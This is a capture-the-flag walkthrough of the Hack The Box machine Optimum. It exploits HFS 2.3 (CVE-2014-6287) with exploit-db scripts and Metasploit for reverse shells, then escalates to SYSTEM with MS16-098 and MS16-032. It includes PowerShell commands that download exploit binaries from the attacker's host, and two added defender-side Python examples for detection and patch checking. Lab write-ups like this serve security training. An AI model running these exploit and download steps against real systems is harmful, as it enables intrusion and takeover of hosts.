Optimum
https://app.hackthebox.com/machines/6
Victim IP: 10.10.10.8
Attacker IP: 10.10.16.6
Reference: https://0xdf.gitlab.io/2021/03/17/htb-optimum.html#ms16-032
https://medium.com/@toneemarqus/optimum-htb-manual-walkthrough-2023-tonee-e2a53fb59b1d
https://www.cnblogs.com/chengwenjun/p/16693574.html
Port scan
Found that only port 80 is open
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -p- 10.10.10.8
The web page shows the HFS framework, and the version number is 2.3
HFS (HTTP File Server) is an HTTP-based file server that lets users access and share files on a computer through a browser. HFS dates back to 2002 and was developed and released by Rejetto.
Reverse shell 1: Python reverse shell
Searched for related vulnerabilities and found CVE-2014-6287, an RCE
searchsploit hfs 2.3
cp /usr/share/exploitdb/exploits/windows/remote/49584.py ./
Modify the IP in the script
Running the script directly gave the user shell on optimum
python3 49584.py
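As an added, defender-side example that is not part of the original write-up or of the exploit-db scripts: the Python below first parses the version HFS advertises in its HTTP Server header and decides whether it falls in the range CVE-2014-6287 covers (HFS 2.3 through 2.3b; fixed in 2.3c), then scans access-log lines for the documented exploitation indicator, a NUL byte (%00) followed by the HFS macro opener "{." in the request URI. The log format and every log line are constructed for this example.

```python
"""
Added example (not from the original write-up, HFS, or exploit-db):
defender-side checks for the HFS 2.3 issue, CVE-2014-6287.
"""
import re
from urllib.parse import unquote

# Matches "HFS 2.3", "HFS 2.3b", "HFS 2.3c", "HFS 2.4" in a Server header.
_VERSION_RE = re.compile(r"HFS\s+(\d+)\.(\d+)([a-z]?)", re.IGNORECASE)

# Constructed access-log layout: client, method, URI, status (space-separated).
_LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")


def hfs_version_from_header(server_header):
    """Return (major, minor, letter) parsed from a Server header, or None."""
    m = _VERSION_RE.search(server_header or "")
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), m.group(3).lower()


def affected_by_cve_2014_6287(version):
    """True for HFS 2.3, 2.3a and 2.3b; False for 2.3c and later.
    Versions outside the 2.3 line return None (not covered by the CVE text)."""
    if version is None:
        return None
    major, minor, letter = version
    if (major, minor) != (2, 3):
        return None
    return letter < "c"  # "" < "a" < "b" < "c" in string comparison


def _fully_decode(s, rounds=3):
    """Undo percent-encoding repeatedly so double-encoded requests are caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_cve_2014_6287_attempts(log_lines):
    """Return (client, raw_uri) for lines whose decoded URI carries the
    NUL byte followed by the macro opener '{.', however it was encoded."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line.strip())
        if not m:
            continue
        client, _method, raw_uri, _status = m.groups()
        if "\x00{." in _fully_decode(raw_uri):
            hits.append((client, raw_uri))
    return hits


# Constructed sample log: two encodings of the indicator, one double-encoded,
# and two benign requests. "xxx" stands in for whatever macro name was sent.
SAMPLE_LOG = [
    "10.0.0.5 GET /?search=%00%7B.xxx.%7D 200",
    "10.0.0.5 GET /?search=%00{.xxx.} 200",
    "10.0.0.6 GET /?search=%2500%257B.xxx.%257D 200",
    "10.0.0.7 GET /?search=report.pdf 200",
    "10.0.0.8 GET /index.html 200",
]

if __name__ == "__main__":
    version = hfs_version_from_header("Server: HFS 2.3")
    print("version:", version, "affected:", affected_by_cve_2014_6287(version))
    for client, uri in find_cve_2014_6287_attempts(SAMPLE_LOG):
        print("possible CVE-2014-6287 attempt from", client, ":", uri)
```

The log check matches on the decoded request, so the same indicator is found whether the braces and NUL arrive raw, percent-encoded or double-encoded; the version check is deliberately limited to the 2.3 line the CVE text names and reports None for anything else rather than guessing.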
Reverse shell 2: Metasploit reverse shell
search hfs    (search for related exploit modules)
use 1    (selects exploit/windows/http/rejetto_hfs_exec)
show options    (review the settings)
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.10.8
rhosts => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.16.6
srvhost => 10.10.16.6
msf6 exploit(windows/http/rejetto_hfs_exec) > set srvport 5555
srvport => 5555
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.16.6
lhost => 10.10.16.6
msf6 exploit(windows/http/rejetto_hfs_exec) > run
Privilege escalation 1
Run systeminfo to view host information
Reference: https://blog.csdn.net/weixin_45650977/article/details/112554489
Use windows-exploit-suggester.py to check for possible vulnerabilities
On first use, install xlrd 1.2 and fetch the bulletin database:
python2 -m pip install xlrd==1.2.0
python2 windows-exploit-suggester.py --update
Paste the target's systeminfo output into a txt file
python2 windows-exploit-suggester.py --database 2024-12-18-mssb.xls --systeminfo optimum.txt
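As an added example, not the windows-exploit-suggester code itself: the Python below does a minimal form of the comparison that tool performs. It parses the "OS Name", "OS Version" and "Hotfix(s)" fields of pasted systeminfo output and reports which entries of a caller-supplied bulletin-to-KB mapping are not installed. The systeminfo text and the mapping are constructed placeholders; they are not the real Optimum host data and not the real update numbers for MS16-032 or MS16-098.

```python
"""
Added example (not windows-exploit-suggester): parse systeminfo output and
compare installed hotfixes against a caller-supplied list of required KBs.
"""
import re

# Constructed systeminfo excerpt; the host name, build and KB numbers are
# placeholders, not data from the machine in the write-up.
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1000001
                           [02]: KB1000002
                           [03]: KB1000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Adapter
"""

# Constructed bulletin -> KB mapping; placeholder identifiers only.
REQUIRED_KBS_EXAMPLE = {
    "MS16-EXAMPLE-A": "KB1000002",  # present in the sample above
    "MS16-EXAMPLE-B": "KB1000009",  # absent from the sample above
}

# "Field Name:   value" lines start at column 0; continuation lines are indented.
_FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z /()]*?):\s+(.*)$")
_KB_RE = re.compile(r"\bKB\d+\b")


def parse_systeminfo(text):
    """Return a dict of top-level fields plus a 'hotfixes' set of KB numbers."""
    info = {"hotfixes": set()}
    current = None
    for line in text.splitlines():
        m = _FIELD_RE.match(line)
        if m:
            current = m.group(1).strip()
            info[current] = m.group(2).strip()
        # KB numbers appear on the indented lines that follow "Hotfix(s):".
        if current == "Hotfix(s)":
            info["hotfixes"].update(_KB_RE.findall(line))
    return info


def unpatched_bulletins(info, bulletin_to_kb):
    """Bulletins whose KB is not in the parsed hotfix set, sorted by name."""
    return sorted(b for b, kb in bulletin_to_kb.items() if kb not in info["hotfixes"])


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed["OS Name"], "|", parsed["OS Version"])
    print("installed:", sorted(parsed["hotfixes"]))
    print("missing:", unpatched_bulletins(parsed, REQUIRED_KBS_EXAMPLE))
```

The parser keys on the colon-terminated field names at column 0, so indented continuation lines (the per-KB entries, the per-NIC entries) are attributed to the field above them; that is the same layout the real tool relies on when it reads the pasted systeminfo file.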
Exploit MS16-098
Because the PowerShell shell obtained via 49584.py gave no response when running the exe, switched to 39161.py
Modify the attacker IP and the listening port
Run python2 39161.py 10.10.10.8 80 to get a cmd shell
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098
Upload bfill.exe
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.6/windows/MS16-098/bfill.exe', 'C:\Users\kostas\Desktop\bfill.exe')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.6/Invoke-MS16032.ps1', 'C:\Users\kostas\Downloads\Invoke-MS16032.ps1')"
Run bfill.exe
Privilege escalation 2
bg    (background the session)
search local_exploit_suggester    (scan for local vulnerabilities)
use 0
show sessions
set session 1
run
Escalate privileges with ms16_032
1  exploit/windows/local/bypassuac_eventvwr  Yes  The target appears to be vulnerable.
2  exploit/windows/local/bypassuac_sluihijack  Yes  The target appears to be vulnerable.
3  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move  Yes  The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
4  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes  The service is running, but could not be validated.
5  exploit/windows/local/tokenmagic
Run ms16_032
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.16.6
lhost => 10.10.16.6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 1111
lport => 1111
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
Successfully obtained authority\system privileges
Originally published on the WeChat official account (王之暴龙战神): Optimum